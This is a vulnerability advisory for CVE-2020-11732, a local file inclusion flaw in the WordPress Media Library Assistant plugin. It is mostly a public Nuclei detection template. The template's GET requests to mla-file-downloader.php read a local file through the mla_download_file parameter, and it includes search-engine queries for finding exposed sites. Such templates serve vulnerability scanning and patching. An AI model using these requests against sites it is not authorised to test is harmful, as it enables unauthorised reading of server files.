CVE-2020-11732: Media Library Assistant < 2.82 - Unauthenticated Limited Local File Inclusion

Date: 2025-12-02 | Affected software: Media Library Assistant | PoC: Public

Vulnerability description

The Media Library Assistant plugin for WordPress before 2.82 contains a local file inclusion caused by the unsanitized mla_gallery link parameter, letting attackers include arbitrary local files. Exploitation requires access to the vulnerable link.

PoC code [public]

id: CVE-2020-11732

info:
  name: Media Library Assistant < 2.82 - Unauthenticated Limited Local File Inclusion
  author: Sourabh-Sahu
  severity: high
  description: |
    Media Library Assistant plugin for WordPress before 2.82 contains a local file inclusion caused by unsanitized mla_gallery link parameter, letting attackers include arbitrary local files, exploit requires access to the vulnerable link.
  impact: |
    Attackers can include arbitrary local files, potentially leading to information disclosure or code execution.
  remediation: |
    Update to version 2.82 or later.
  reference:
    - https://wpscan.com/vulnerability/80d60584-fa03-407e-a7bd-32d507a1046d/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-11732
    epss-score: 0.3478
    epss-percentile: 0.96849
    cpe: cpe:2.3:a:davidlingren:media_library_assistant:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: davidlingren
    product: media_library_assistant
    framework: wordpress
    fofa-query: body="wp-content/plugins/media-library-assistant"
    publicwww-query: "/wp-content/plugins/media-library-assistant/"
    shodan-query: http.html:"wp-content/plugins/media-library-assistant"
  tags: wpscan,cve,cve2020,wordpress,wp,wp-plugin,media-library-assistant,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wordpress/wp-content/index.php"
      - "{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wp-content/index.php"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '// Silence is golden.')"
        condition: and
# digest: 490a00463044022050740b81f8e23c452d00fdb3c0c0a36c0a1a0f57e527e936a0e5876115e1cfca02204d96d0582124e49da8436fc9a9e13d6d2e4d307cf646e4783cf9247116d195e1:922c64590222798bb761d5b6d8e72950
